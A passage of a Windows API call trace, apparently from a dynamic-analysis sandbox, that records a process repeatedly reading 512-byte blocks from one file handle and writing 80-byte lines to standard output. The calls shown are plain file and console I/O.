lpBuffer=0x1cec1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec1c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.866] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.866] GetFileType (hFile=0x4c) returned 0x1 [0111.866] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.866] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec6c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.866] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.866] GetFileType (hFile=0x4c) returned 0x1 [0111.866] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.866] WriteFile (in: hFile=0x4c, lpBuffer=0x1cecbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cecbc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.866] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.866] GetFileType (hFile=0x4c) returned 0x1 [0111.866] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.866] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced0c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.866] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.866] GetFileType (hFile=0x4c) returned 0x1 [0111.866] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.866] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced5c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced5c*, lpNumberOfBytesWritten=0x1cdd60*=0x20, lpOverlapped=0x0) returned 1 [0111.867] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.867] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdd4c | out: lpNewFilePointer=0x0) returned 1 [0111.867] _get_osfhandle 
(_FileHandle=4) returned 0x54 [0111.867] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.867] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.867] GetFileType (hFile=0x4c) returned 0x1 [0111.867] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.867] GetFileType (hFile=0x4c) returned 0x1 [0111.867] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.867] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceb7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.867] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.867] GetFileType (hFile=0x4c) returned 0x1 [0111.867] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.867] WriteFile (in: hFile=0x4c, lpBuffer=0x1cebcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cebcc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.867] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.867] GetFileType (hFile=0x4c) returned 0x1 [0111.867] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.867] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec1c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.867] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.867] GetFileType (hFile=0x4c) returned 0x1 [0111.867] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.867] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec6c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.867] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.867] 
GetFileType (hFile=0x4c) returned 0x1 [0111.867] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.867] WriteFile (in: hFile=0x4c, lpBuffer=0x1cecbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cecbc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.867] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.867] GetFileType (hFile=0x4c) returned 0x1 [0111.867] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.867] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced0c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.867] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.867] GetFileType (hFile=0x4c) returned 0x1 [0111.867] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.867] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced5c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced5c*, lpNumberOfBytesWritten=0x1cdd60*=0x20, lpOverlapped=0x0) returned 1 [0111.868] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.868] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdd4c | out: lpNewFilePointer=0x0) returned 1 [0111.868] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.868] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.868] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.868] GetFileType (hFile=0x4c) returned 0x1 [0111.868] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.868] GetFileType (hFile=0x4c) returned 0x1 [0111.868] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.868] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceb7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | 
out: lpBuffer=0x1ceb7c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.868] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.868] GetFileType (hFile=0x4c) returned 0x1 [0111.868] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.868] WriteFile (in: hFile=0x4c, lpBuffer=0x1cebcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cebcc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.868] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.868] GetFileType (hFile=0x4c) returned 0x1 [0111.868] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.868] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec1c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.868] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.868] GetFileType (hFile=0x4c) returned 0x1 [0111.868] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.868] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec6c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.868] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.868] GetFileType (hFile=0x4c) returned 0x1 [0111.868] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.868] WriteFile (in: hFile=0x4c, lpBuffer=0x1cecbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cecbc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.868] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.868] GetFileType (hFile=0x4c) returned 0x1 [0111.868] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.868] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced0c*, 
lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.868] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.868] GetFileType (hFile=0x4c) returned 0x1 [0111.868] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.868] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced5c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced5c*, lpNumberOfBytesWritten=0x1cdd60*=0x20, lpOverlapped=0x0) returned 1 [0111.869] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.869] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdd4c | out: lpNewFilePointer=0x0) returned 1 [0111.869] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.869] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.869] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.869] GetFileType (hFile=0x4c) returned 0x1 [0111.869] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.869] GetFileType (hFile=0x4c) returned 0x1 [0111.869] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.869] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceb7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.869] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.869] GetFileType (hFile=0x4c) returned 0x1 [0111.869] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.869] WriteFile (in: hFile=0x4c, lpBuffer=0x1cebcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cebcc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.869] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.869] GetFileType (hFile=0x4c) returned 0x1 [0111.869] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0111.869] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec1c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.869] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.869] GetFileType (hFile=0x4c) returned 0x1 [0111.869] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.869] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec6c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.869] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.869] GetFileType (hFile=0x4c) returned 0x1 [0111.869] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.869] WriteFile (in: hFile=0x4c, lpBuffer=0x1cecbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cecbc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.869] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.869] GetFileType (hFile=0x4c) returned 0x1 [0111.869] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.869] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced0c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.869] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.869] GetFileType (hFile=0x4c) returned 0x1 [0111.869] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.869] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced5c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced5c*, lpNumberOfBytesWritten=0x1cdd60*=0x20, lpOverlapped=0x0) returned 1 [0111.869] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.870] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdd4c | out: lpNewFilePointer=0x0) 
returned 1 [0111.870] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.870] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.870] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.870] GetFileType (hFile=0x4c) returned 0x1 [0111.870] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.870] GetFileType (hFile=0x4c) returned 0x1 [0111.870] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.870] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceb7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.870] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.870] GetFileType (hFile=0x4c) returned 0x1 [0111.870] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.870] WriteFile (in: hFile=0x4c, lpBuffer=0x1cebcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cebcc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.870] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.870] GetFileType (hFile=0x4c) returned 0x1 [0111.870] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.870] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec1c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.870] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.870] GetFileType (hFile=0x4c) returned 0x1 [0111.870] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.870] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec6c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.870] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0111.870] GetFileType (hFile=0x4c) returned 0x1 [0111.870] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.870] WriteFile (in: hFile=0x4c, lpBuffer=0x1cecbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cecbc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.870] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.870] GetFileType (hFile=0x4c) returned 0x1 [0111.870] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.870] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced0c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.870] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.870] GetFileType (hFile=0x4c) returned 0x1 [0111.870] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.870] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced5c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced5c*, lpNumberOfBytesWritten=0x1cdd60*=0x20, lpOverlapped=0x0) returned 1 [0111.870] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.870] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdd4c | out: lpNewFilePointer=0x0) returned 1 [0111.871] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.871] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.871] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.871] GetFileType (hFile=0x4c) returned 0x1 [0111.871] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.871] GetFileType (hFile=0x4c) returned 0x1 [0111.871] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.871] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceb7c*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.871] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.871] GetFileType (hFile=0x4c) returned 0x1 [0111.871] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.871] WriteFile (in: hFile=0x4c, lpBuffer=0x1cebcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cebcc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.871] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.871] GetFileType (hFile=0x4c) returned 0x1 [0111.871] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.871] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec1c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.871] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.871] GetFileType (hFile=0x4c) returned 0x1 [0111.871] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.871] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec6c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.871] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.871] GetFileType (hFile=0x4c) returned 0x1 [0111.871] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.871] WriteFile (in: hFile=0x4c, lpBuffer=0x1cecbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cecbc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.871] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.871] GetFileType (hFile=0x4c) returned 0x1 [0111.871] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.871] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, 
lpOverlapped=0x0 | out: lpBuffer=0x1ced0c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.871] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.871] GetFileType (hFile=0x4c) returned 0x1 [0111.871] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.871] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced5c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced5c*, lpNumberOfBytesWritten=0x1cdd60*=0x20, lpOverlapped=0x0) returned 1 [0111.871] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.871] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdd4c | out: lpNewFilePointer=0x0) returned 1 [0111.872] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.872] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.872] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.872] GetFileType (hFile=0x4c) returned 0x1 [0111.872] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.872] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.872] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.872] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 
[0111.872] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.872] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.872] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.872] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.872] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.873] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.873] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.873] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.873] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, 
lpOverlapped=0x0) returned 1 [0111.873] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.873] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.873] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.873] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.873] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.873] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.873] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.873] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, 